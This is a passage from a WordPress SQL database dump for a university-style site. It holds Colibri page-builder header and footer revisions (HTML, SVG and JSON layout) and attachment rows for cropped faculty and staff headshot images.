rentId\":\"25-h1\",\"type\":\"header\",\"id\":\"25-h24\",\"partialId\":25,\"styleRef\":57}],\"id\":\"25-h1\",\"type\":\"header\",\"ui\":{\"isSelected\":true,\"isHovered\":false},\"partialId\":25,\"styleRef\":34}','','','inherit','closed','closed','','26-revision-v1','','','2023-10-13 10:00:15','2023-10-13 14:00:15','',26,'https://gsudice.dataconn.net/?p=1736',0,'revision','',0),(1737,1,'2023-10-13 10:00:15','2023-10-13 14:00:15','<div data-colibri-id=\"25-h1\" class=\"page-header style-34 style-local-25-h1 position-relative\">\n  <!---->\n  <div data-colibri-navigation-overlap=\"true\" role=\"banner\" class=\"h-navigation_outer h-navigation_overlap style-35-outer style-local-25-h2-outer\">\n    <!---->\n    <div id=\"navigation\" data-colibri-component=\"navigation\" data-colibri-id=\"25-h2\" class=\"h-section h-navigation h-navigation d-flex style-35 style-local-25-h2\">\n      <!---->\n      <div class=\"h-section-grid-container h-section-fluid-container\">\n        <div data-nav-normal=\"\">\n          <div data-colibri-id=\"25-h3\" class=\"h-row-container h-section-boxed-container gutters-row-lg-0 gutters-row-md-0 gutters-row-2 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-2 style-36 style-local-25-h3 position-relative\">\n            <!---->\n            <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-2 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-2\">\n              <!---->\n              <div class=\"h-column h-column-container d-flex h-col-none style-37-outer style-local-25-h4-outer\">\n                <div data-colibri-id=\"25-h4\" data-placeholder-provider=\"navigation-logo\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-37 style-local-25-h4 position-relative\">\n                  <!---->\n                  <!---->\n                  <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-auto align-self-lg-center align-self-md-center align-self-center\">\n                    <!---->\n                    <div data-colibri-id=\"25-h5\" class=\"d-flex align-items-center text-lg-left text-md-left text-left justify-content-lg-start justify-content-md-start justify-content-start style-38 style-local-25-h5 position-relative h-element\">\n                      <!---->\n                      <a rel=\"home\" href=\"[colibri_home_url]\" h-use-smooth-scroll=\"true\" class=\"d-flex align-items-center\"><span class=\"h-logo__text h-logo__text_h logo-text d-inline-block style-38-text style-local-25-h5-text\">[colibri_site_title]</span></a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n              <div class=\"h-column h-column-container d-flex h-col-none style-39-outer style-local-25-h6-outer h-hide-sm\">\n                <div data-colibri-id=\"25-h6\" data-placeholder-provider=\"navigation-spacing\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-39 style-local-25-h6 h-hide-sm position-relative\">\n                  <!---->\n                  <!---->\n                  <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-center align-self-md-center align-self-center\">\n                    <!---->\n                    <div data-colibri-id=\"25-h7\" class=\"style-40 style-local-25-h7 position-relative h-element\">\n                      <!---->\n                    </div>\n                  </div>\n                </div>\n              </div>\n              <div class=\"h-column h-column-container d-flex h-col-none style-41-outer style-local-25-h8-outer\">\n                <div data-colibri-id=\"25-h8\" data-placeholder-provider=\"navigation-menu\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-41 style-local-25-h8 position-relative\">\n                  <!---->\n                  <!---->\n                  <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-auto align-self-lg-center align-self-md-center align-self-center\">\n                    <!---->\n                    <div data-colibri-component=\"dropdown-menu\" role=\"navigation\" h-use-smooth-scroll-all=\"true\" data-colibri-id=\"25-h9\" class=\"h-menu h-global-transition-all h-ignore-global-body-typography has-offcanvas-tablet h-menu-horizontal h-dropdown-menu style-42 style-local-25-h9 position-relative h-element\">\n                      <!---->\n                      <div class=\"h-global-transition-all h-main-menu\">[colibri_print_menu id=\"header-menu\" classes=\"bordered-active-item bordered-active-item--bottom effect-borders-grow grow-from-center\" show_shopping_cart=\"0\" depth=\"0\"]</div>\n                      <div data-colibri-id=\"25-h10\" class=\"h-mobile-menu h-global-transition-disable style-43 style-local-25-h10 position-relative h-element\">\n                        <!---->\n                        <a data-click-outside=\"true\" data-target=\"#offcanvas-wrapper-25-h10\" data-target-id=\"offcanvas-wrapper-25-h10\" data-offcanvas-overlay-id=\"offcanvas-overlay-25-h10\" href=\"#\" data-colibri-component=\"offcanvas\" data-direction=\"right\"\n                          data-push=\"false\" title=\"Menu\" class=\"h-hamburger-button\">\n                          <div class=\"icon-container h-hamburger-icon\">\n                            <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                              <!--Icon by Font Awesome (https://fontawesome.com)-->\n                              <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"bars\" viewBox=\"0 0 1536 1896.0833\">\n                                <path d=\"M1536 1344v128q0 26-19 45t-45 19H64q-26 0-45-19t-19-45v-128q0-26 19-45t45-19h1408q26 0 45 19t19 45zm0-512v128q0 26-19 45t-45 19H64q-26 0-45-19T0 960V832q0-26 19-45t45-19h1408q26 0 45 19t19 45zm0-512v128q0 26-19 45t-45 19H64q-26 0-45-19T0 448V320q0-26 19-45t45-19h1408q26 0 45 19t19 45z\"></path>\n                              </svg>\n                            </div>\n                          </div>\n                        </a>\n                        <div id=\"offcanvas-wrapper-25-h10\" class=\"h-offcanvas-panel offcanvas offcanvas-right hide force-hide style-43-offscreen style-local-25-h10-offscreen\">\n                          <div data-colibri-id=\"25-h11\" class=\"d-flex flex-column h-offscreen-panel style-44 style-local-25-h11 position-relative h-element\">\n                            <!---->\n                            <div class=\"offscreen-header h-ui-empty-state-container\">\n                              <div data-colibri-id=\"25-h13\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-45 style-local-25-h13 position-relative\">\n                                <!---->\n                                <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n                                  <!---->\n                                  <div class=\"h-column h-column-container d-flex h-col-lg-6 h-col-md-6 h-col-12 style-46-outer style-local-25-h14-outer\">\n                                    <div data-colibri-id=\"25-h14\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-46 style-local-25-h14 position-relative\">\n                                      <!---->\n                                      <!---->\n                                      <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                                        <!---->\n                                        <div data-colibri-id=\"25-h15\" class=\"d-flex align-items-center text-lg-center text-md-center text-center justify-content-lg-center justify-content-md-center justify-content-center style-47 style-local-25-h15 position-relative h-element\">\n                                          <!---->\n                                          <a rel=\"home\" href=\"[colibri_home_url]\" h-use-smooth-scroll=\"true\" class=\"d-flex align-items-center\"><span class=\"h-logo__text h-logo__text_h logo-text d-inline-block style-47-text style-local-25-h15-text\">[colibri_site_title]</span></a>\n                                        </div>\n                                      </div>\n                                    </div>\n                                  </div>\n                                </div>\n                              </div>\n                            </div>\n                            <div class=\"offscreen-content\">\n                              <!---->\n                              <div data-colibri-component=\"accordion-menu\" role=\"navigation\" h-use-smooth-scroll-all=\"true\" data-colibri-id=\"25-h12\" class=\"h-menu h-global-transition-all h-ignore-global-body-typography h-mobile-menu h-menu-accordion style-50 style-local-25-h12 position-relative h-element\">\n                                <!---->\n                                <div class=\"h-global-transition-all h-mobile-menu\">[colibri_print_menu id=\"header-menu\" classes=\"none \" show_shopping_cart=\"0\" depth=\"0\"]</div>\n                              </div>\n                            </div>\n                            <div class=\"offscreen-footer h-ui-empty-state-container\">\n                              <div data-colibri-id=\"25-h16\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-48 style-local-25-h16 position-relative\">\n                                <!---->\n                                <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n                                  <!---->\n                                  <div class=\"h-column h-column-container d-flex h-col-lg-6 h-col-md-6 h-col-12 style-49-outer style-local-25-h17-outer\">\n                                    <div data-colibri-id=\"25-h17\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-49 style-local-25-h17 position-relative\">\n                                      <!---->\n                                      <!---->\n                                      <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n                                        <!---->\n                                      </div>\n                                    </div>\n                                  </div>\n                                </div>\n                              </div>\n                            </div>\n                          </div>\n                        </div>\n                        <div id=\"offcanvas-overlay-25-h10\" class=\"offscreen-overlay style-43-offscreenOverlay style-local-25-h10-offscreenOverlay\"></div>\n                      </div>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n        <div data-nav-sticky=\"\" style=\"display: none;\"></div>\n      </div>\n    </div>\n  </div>\n  <div data-colibri-id=\"25-h24\" id=\"hero\" class=\"h-section h-hero d-flex align-items-lg-center align-items-md-center align-items-center style-57 style-local-25-h24 position-relative\">\n    <!---->\n    <!---->\n    <div style=\"height: 70px; bottom: calc(0px);\" class=\"h-separator\">\n      <svg style=\"fill:#f6f8fa;transform:rotateX(180deg);\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1000 100\" preserveAspectRatio=\"none\">\n        <g opacity=\"0.33\">\n          <path d=\"M385.42,52.92c-11.63,4.22-23.18,9-34.52,14.38-103.18,49-91.83-33.55-148.36-.49,50.13,17.35,121.87,64.84,270.46.49,11-4.7,64.52-25.43,118-41.8-4-.52-8.45-.95-13.41-1.28C507.83,41.64,455.4,71.84,385.42,52.92Z\" transform=\"translate(0 0)\" style=\"isolation:isolate\"></path>\n          <path d=\"M0,59.7S48.08,103,116.06,83.43C54.25,76.6,0,39.8,0,39.8Z\" transform=\"translate(0 0)\" style=\"isolation:isolate\"></path>\n          <path d=\"M916.4,48.1c-55.76,5.45-76.83,2-111.28-7.81-3.09,1.4-6.07,2.81-9,4.22,13.93,8.57,25.54,16.74,33.15,22.39,13,9.8,43,25.4,75.8,22.1S1000,59.7,1000,59.7V36.5s-6.87-4.5-21.48-9.06C966,36.56,946.56,45.15,916.4,48.1Z\" transform=\"translate(0 0)\" style=\"isolation:isolate\"></path>\n        </g>\n        <g opacity=\"0.66\">\n          <path d=\"M771.65,30.49,766.1,28.9c-55-15.81-99.84-18-138.66-13.76a368.79,368.79,0,0,0-49.81,9.08c5,.33,9.44.76,13.41,1.28a89.13,89.13,0,0,1,13.86,2.7C656.8,44.1,688.5,67.3,734,67.3c19.82,0,38-11.12,62.15-22.79,2.9-1.41,5.88-2.82,9-4.22C795.39,37.52,784.59,34.23,771.65,30.49Z\"\n            transform=\"translate(0 0)\"></path>\n          <path d=\"M371,48.4C242,1.8,242,5.4,184.8,20.6,128,35.8,132.3,44.9,89.9,52.5,28.6,63.7,0,0,0,0V39.8S54.25,76.6,116.06,83.43c28.46,3.15,58.53-.05,85.64-16.13l.84-.49c56.53-33.06,45.18,49.44,148.36.49,11.34-5.38,22.89-10.16,34.52-14.38Q378.34,51,371,48.4Z\"\n            transform=\"translate(0 0)\"></path>\n          <path d=\"M978.52,27.44C993.13,32,1000,36.5,1000,36.5V0S996.54,14.27,978.52,27.44Z\" transform=\"translate(0 0)\"></path>\n        </g>\n        <path d=\"M0,0S28.6,63.7,89.9,52.5c42.4-7.6,38.1-16.7,94.9-31.9C242,5.4,242,1.8,371,48.4q7.33,2.61,14.42,4.52c70,18.92,122.41-11.28,192.21-28.7a368.79,368.79,0,0,1,49.81-9.08c38.82-4.21,83.68-2.05,138.66,13.76l5.55,1.59c12.94,3.74,23.74,7,33.47,9.8,34.45,9.83,55.52,13.26,111.28,7.81,30.16-3,49.63-11.54,62.12-20.66C996.54,14.27,1000,0,1000,0Z\"\n          transform=\"translate(0 0)\"></path>\n      </svg>\n    </div>\n    <div class=\"h-section-grid-container h-navigation-padding h-section-boxed-container\">\n      <!---->\n      <div data-colibri-id=\"25-h25\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-58 style-local-25-h25 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-59-outer style-local-25-h26-outer\">\n            <div data-colibri-id=\"25-h26\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-59 style-local-25-h26 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"25-h27\" class=\"page-title style-60 style-local-25-h27 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-page-title__outer style-60-outer style-local-25-h27-outer\">\n                    <div class=\"h-global-transition-all\">[colibri_page_title tag=\"h1\"]</div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <!---->\n        </div>\n      </div>\n    </div>\n  </div>\n</div>','header_post','','inherit','closed','closed','','25-revision-v1','','','2023-10-13 10:00:15','2023-10-13 14:00:15','',25,'https://gsudice.dataconn.net/?p=1737',0,'revision','',0),(1738,1,'2023-10-13 10:00:15','2023-10-13 14:00:15','{\"name\":\"hop-footer\",\"children\":[{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Footers\",\"attrs\":{\"id\":\"Footers\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":100,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-copyright\",\"slot\":null,\"parentId\":\"28-f4\",\"index\":0,\"id\":\"28-f5\",\"partialId\":28,\"styleRef\":270,\"type\":\"footer\"}],\"id\":\"28-f4\",\"parentId\":\"28-f3\",\"partialId\":28,\"styleRef\":269,\"type\":\"footer\"}],\"parentId\":\"28-f2\",\"index\":0,\"id\":\"28-f3\",\"partialId\":28,\"styleRef\":268,\"type\":\"footer\"}],\"id\":\"28-f2\",\"parentId\":\"28-f1\",\"partialId\":28,\"styleRef\":267,\"type\":\"footer\"}],\"id\":\"28-f1\",\"ui\":{\"isSelected\":false,\"isHovered\":false},\"type\":\"footer\",\"partialId\":28,\"styleRef\":266}','','','inherit','closed','closed','','29-revision-v1','','','2023-10-13 10:00:15','2023-10-13 14:00:15','',29,'https://gsudice.dataconn.net/?p=1738',0,'revision','',0),(1739,1,'2023-10-13 10:00:15','2023-10-13 14:00:15','<div data-enabled=\"true\" data-colibri-component=\"footer-parallax\" data-colibri-id=\"28-f1\" class=\"page-footer style-266 style-local-28-f1 position-relative\">\n  <!---->\n  <div data-colibri-component=\"section\" data-colibri-id=\"28-f2\" id=\"Footers\" class=\"h-section h-section-global-spacing d-flex align-items-lg-end align-items-md-end align-items-end style-267 style-local-28-f2 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-boxed-container\">\n      <!---->\n      <div data-colibri-id=\"28-f3\" class=\"h-row-container gutters-row-lg-1 gutters-row-md-1 gutters-row-2 gutters-row-v-lg-1 gutters-row-v-md-1 gutters-row-v-2 style-268 style-local-28-f3 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-1 gutters-col-md-1 gutters-col-2 gutters-col-v-lg-1 gutters-col-v-md-1 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-269-outer style-local-28-f4-outer\">\n            <div data-colibri-id=\"28-f4\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-1 h-px-md-1 h-px-2 v-inner-lg-1 v-inner-md-1 v-inner-2 style-269 style-local-28-f4 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"28-f5\" class=\"style-270 style-local-28-f5 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-global-transition-all\">[colibri_copyright]© {year} {site-name}. Created for free using WordPress and\n                    <a target=\"_blank\" href=\"https://colibriwp.com\" rel=\"noopener\">Colibri</a>[/colibri_copyright]</div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n</div>','footer_post','','inherit','closed','closed','','28-revision-v1','','','2023-10-13 10:00:15','2023-10-13 14:00:15','',28,'https://gsudice.dataconn.net/?p=1739',0,'revision','',0),(1740,1,'2023-10-13 10:00:42','2023-10-13 14:00:42','https://gsudice.dataconn.net/wp-content/uploads/2023/10/cropped-282038166_2492815234187345_4129762528023780269_n.jpg','cropped-282038166_2492815234187345_4129762528023780269_n.jpg','','inherit','open','closed','','cropped-282038166_2492815234187345_4129762528023780269_n-jpg-2','','','2023-10-13 10:02:07','2023-10-13 14:02:07','',0,'https://gsudice.dataconn.net/wp-content/uploads/2023/10/cropped-cropped-282038166_2492815234187345_4129762528023780269_n-e1697142834100.jpg',0,'attachment','image/jpeg',0),(1742,1,'2023-10-13 10:02:11','2023-10-13 14:02:11','https://gsudice.dataconn.net/wp-content/uploads/2023/10/cropped-282038166_2492815234187345_4129762528023780269_n.jpg','cropped-282038166_2492815234187345_4129762528023780269_n.jpg','','inherit','open','closed','','cropped-282038166_2492815234187345_4129762528023780269_n-jpg-3','','','2023-10-13 10:02:11','2023-10-13 14:02:11','',0,'https://gsudice.dataconn.net/wp-content/uploads/2023/10/cropped-cropped-cropped-282038166_2492815234187345_4129762528023780269_n-e1697205710763.jpg',0,'attachment','image/jpeg',0),(1743,1,'2023-10-13 10:03:27','2023-10-13 14:03:27','https://gsudice.dataconn.net/wp-content/uploads/2022/06/cropped-IMG_1240-scaled-1.jpg','IMG_1240','','inherit','open','closed','','img_1240-3','','','2023-10-13 10:03:55','2023-10-13 14:03:55','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/06/cropped-cropped-IMG_1240-scaled-1-e1697205792255.jpg',0,'attachment','image/jpeg',0),(1744,1,'2023-10-13 10:03:58','2023-10-13 14:03:58','https://gsudice.dataconn.net/wp-content/uploads/2022/06/cropped-IMG_1240-scaled-1.jpg','IMG_1240','','inherit','open','closed','','img_1240-4','','','2023-10-13 10:03:58','2023-10-13 14:03:58','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/06/cropped-cropped-cropped-IMG_1240-scaled-1-e1697205818731.jpg',0,'attachment','image/jpeg',0),(1745,1,'2023-10-13 10:06:26','2023-10-13 14:06:26','https://gsudice.dataconn.net/wp-content/uploads/2022/04/cropped-Emma.jpg','cropped-Emma.jpg','','inherit','open','closed','','cropped-emma-jpg-2','','','2023-10-13 10:06:26','2023-10-13 14:06:26','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/04/cropped-cropped-Emma-e1697205932363.jpg',0,'attachment','image/jpeg',0),(1746,1,'2023-10-13 10:16:51','2023-10-13 14:16:51','https://gsudice.dataconn.net/wp-content/uploads/2023/09/cropped-anupam.jpg','cropped-anupam.jpg','','inherit','open','closed','','cropped-anupam-jpg','','','2023-10-13 10:17:24','2023-10-13 14:17:24','',0,'https://gsudice.dataconn.net/wp-content/uploads/2023/09/cropped-anupam.jpg',0,'attachment','image/jpeg',0),(1747,1,'2023-10-13 10:17:27','2023-10-13 14:17:27','https://gsudice.dataconn.net/wp-content/uploads/2023/09/cropped-anupam.jpg','cropped-anupam.jpg','','inherit','open','closed','','cropped-anupam-jpg-2','','','2023-10-13 10:17:27','2023-10-13 14:17:27','',0,'https://gsudice.dataconn.net/wp-content/uploads/2023/09/cropped-cropped-anupam-e1697206626249.jpg',0,'attachment','image/jpeg',0),(1748,1,'2023-10-13 10:18:17','2023-10-13 14:18:17','https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Ardavan.jpg','cropped-Ardavan.jpg','','inherit','open','closed','','cropped-ardavan-jpg-2','','','2023-10-13 10:18:17','2023-10-13 14:18:17','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-cropped-Ardavan-e1697206676649.jpg',0,'attachment','image/jpeg',0),(1749,1,'2023-10-13 10:19:49','2023-10-13 14:19:49','https://gsudice.dataconn.net/wp-content/uploads/2022/04/cropped-Jean.jpg','cropped-cropped-Jean.jpg','','inherit','open','closed','','cropped-cropped-jean-jpg','','','2023-10-13 10:20:12','2023-10-13 14:20:12','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/04/cropped-cropped-Jean.jpg',0,'attachment','image/jpeg',0),(1750,1,'2023-10-13 10:20:14','2023-10-13 14:20:14','https://gsudice.dataconn.net/wp-content/uploads/2022/04/cropped-Jean.jpg','cropped-cropped-Jean.jpg','','inherit','open','closed','','cropped-cropped-jean-jpg-2','','','2023-10-13 10:20:14','2023-10-13 14:20:14','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/04/cropped-cropped-cropped-Jean-e1697206801281.jpg',0,'attachment','image/jpeg',0),(1751,1,'2023-10-13 10:21:06','2023-10-13 14:21:06','https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Basit.jpg','cropped-Basit.jpg','','inherit','open','closed','','cropped-basit-jpg','','','2023-10-13 10:21:42','2023-10-13 14:21:42','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Basit.jpg',0,'attachment','image/jpeg',0),(1752,1,'2023-10-13 10:21:44','2023-10-13 14:21:44','https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Basit.jpg','cropped-Basit.jpg','','inherit','open','closed','','cropped-basit-jpg-2','','','2023-10-13 10:21:44','2023-10-13 14:21:44','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-cropped-Basit-e1697206890221.jpg',0,'attachment','image/jpeg',0),(1753,1,'2023-10-13 10:21:58','2023-10-13 14:21:58','https://gsudice.dataconn.net/wp-content/uploads/2023/09/cropped-sara-edwards1.jpg','cropped-sara-edwards1.jpg','','inherit','open','closed','','cropped-sara-edwards1-jpg','','','2023-10-13 10:22:21','2023-10-13 14:22:21','',0,'https://gsudice.dataconn.net/wp-content/uploads/2023/09/cropped-sara-edwards1.jpg',0,'attachment','image/jpeg',0),(1754,1,'2023-10-13 10:22:22','2023-10-13 14:22:22','https://gsudice.dataconn.net/wp-content/uploads/2023/09/cropped-sara-edwards1.jpg','cropped-sara-edwards1.jpg','','inherit','open','closed','','cropped-sara-edwards1-jpg-2','','','2023-10-13 10:22:22','2023-10-13 14:22:22','',0,'https://gsudice.dataconn.net/wp-content/uploads/2023/09/cropped-cropped-sara-edwards1-e1697206932891.jpg',0,'attachment','image/jpeg',0),(1755,1,'2023-10-13 10:23:39','2023-10-13 14:23:39','https://gsudice.dataconn.net/wp-content/uploads/2022/04/cropped-cropped-Ryan-e1649958770354.jpg','cropped-cropped-cropped-Ryan-e1649958770354.jpg','','inherit','open','closed','','cropped-cropped-cropped-ryan-e1649958770354-jpg','','','2023-10-13 10:23:59','2023-10-13 14:23:59','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/04/cropped-cropped-cropped-Ryan-e1649958770354.jpg',0,'attachment','image/jpeg',0),(1756,1,'2023-10-13 10:24:00','2023-10-13 14:24:00','https://gsudice.dataconn.net/wp-content/uploads/2022/04/cropped-cropped-Ryan-e1649958770354.jpg','cropped-cropped-cropped-Ryan-e1649958770354.jpg','','inherit','open','closed','','cropped-cropped-cropped-ryan-e1649958770354-jpg-2','','','2023-10-13 10:24:00','2023-10-13 14:24:00','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/04/cropped-cropped-cropped-cropped-Ryan-e1697207029774.jpg',0,'attachment','image/jpeg',0),(1757,1,'2023-10-13 10:24:44','2023-10-13 14:24:44','https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Angelique.jpg','cropped-Angelique.jpg','','inherit','open','closed','','cropped-angelique-jpg-2','','','2023-10-13 10:24:44','2023-10-13 14:24:44','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-cropped-Angelique-e1697207062254.jpg',0,'attachment','image/jpeg',0),(1758,1,'2023-10-13 10:26:43','2023-10-13 14:26:43','https://gsudice.dataconn.net/wp-content/uploads/2023/09/cropped-Screen-Shot-2023-09-26-at-9.33.41-PM-e1697207183631.png','Screen Shot 2023-09-26 at 9.33.41 PM','','inherit','open','closed','','screen-shot-2023-09-26-at-9-33-41-pm-2','','','2023-10-13 10:26:43','2023-10-13 14:26:43','',0,'https://gsudice.dataconn.net/wp-content/uploads/2023/09/cropped-Screen-Shot-2023-09-26-at-9.33.41-PM-e1697207183631.png',0,'attachment','image/png',0),(1759,1,'2023-10-13 10:31:19','2023-10-13 14:31:19','','md shah sayem','','inherit','open','closed','','md-shah-sayem','','','2023-10-13 10:31:19','2023-10-13 14:31:19','',0,'https://gsudice.dataconn.net/wp-content/uploads/2023/10/md-shah-sayem.jpg',0,'attachment','image/jpeg',0),(1760,1,'2023-10-13 10:31:44','2023-10-13 14:31:44','https://gsudice.dataconn.net/wp-content/uploads/2023/10/cropped-md-shah-sayem.jpg','cropped-md-shah-sayem.jpg','','inherit','open','closed','','cropped-md-shah-sayem-jpg','','','2023-10-13 10:32:06','2023-10-13 14:32:06','',0,'https://gsudice.dataconn.net/wp-content/uploads/2023/10/cropped-md-shah-sayem.jpg',0,'attachment','image/jpeg',0),(1761,1,'2023-10-13 10:32:08','2023-10-13 14:32:08','https://gsudice.dataconn.net/wp-content/uploads/2023/10/cropped-md-shah-sayem.jpg','cropped-md-shah-sayem.jpg','','inherit','open','closed','','cropped-md-shah-sayem-jpg-2','','','2023-10-13 10:32:08','2023-10-13 14:32:08','',0,'https://gsudice.dataconn.net/wp-content/uploads/2023/10/cropped-cropped-md-shah-sayem-e1697207514119.jpg',0,'attachment','image/jpeg',0),(1763,1,'2023-10-13 10:35:22','2023-10-13 14:35:22','https://gsudice.dataconn.net/wp-content/uploads/2023/09/cropped-rn_image_picker_lib_temp_faf29ef5-64ad-4e05-bc96-2144c4d57790.jpg','cropped-rn_image_picker_lib_temp_faf29ef5-64ad-4e05-bc96-2144c4d57790.jpg','','inherit','open','closed','','cropped-rn_image_picker_lib_temp_faf29ef5-64ad-4e05-bc96-2144c4d57790-jpg-2','','','2023-10-13 10:35:22','2023-10-13 14:35:22','',0,'https://gsudice.dataconn.net/wp-content/uploads/2023/09/cropped-cropped-rn_image_picker_lib_temp_faf29ef5-64ad-4e05-bc96-2144c4d57790-e1697207627160.jpg',0,'attachment','image/jpeg',0),(1764,1,'2023-10-13 10:36:43','2023-10-13 14:36:43','https://gsudice.dataconn.net/wp-content/uploads/2023/10/cropped-IMG_9249.jpg','cropped-IMG_9249.jpg','','inherit','open','closed','','cropped-img_9249-jpg','','','2023-10-13 10:38:05','2023-10-13 14:38:05','',0,'https://gsudice.dataconn.net/wp-content/uploads/2023/10/cropped-IMG_9249.jpg',0,'attachment','image/jpeg',0),(1765,1,'2023-10-13 10:38:09','2023-10-13 14:38:09','https://gsudice.dataconn.net/wp-content/uploads/2023/10/cropped-IMG_9249.jpg','cropped-IMG_9249.jpg','','inherit','open','closed','','cropped-img_9249-jpg-2','','','2023-10-13 10:38:09','2023-10-13 14:38:09','',0,'https://gsudice.dataconn.net/wp-content/uploads/2023/10/cropped-cropped-IMG_9249-e1697207848252.jpg',0,'attachment','image/jpeg',0),(1766,1,'2023-10-13 10:39:42','2023-10-13 14:39:42','{\"name\":\"hop-content\",\"children\":[{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Faculty\",\"attrs\":{\"id\":\"faculty\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"id\":\"182-c4\",\"parentId\":\"182-c3\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c4\",\"index\":0,\"id\":\"182-c5\",\"partialId\":182,\"styleRef\":973,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-cropped-cropped-cropped-cropped-headshot-1-e1651208089645-2-e1697201737742.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1697,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c4\",\"index\":0,\"id\":\"182-c6\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Chetan 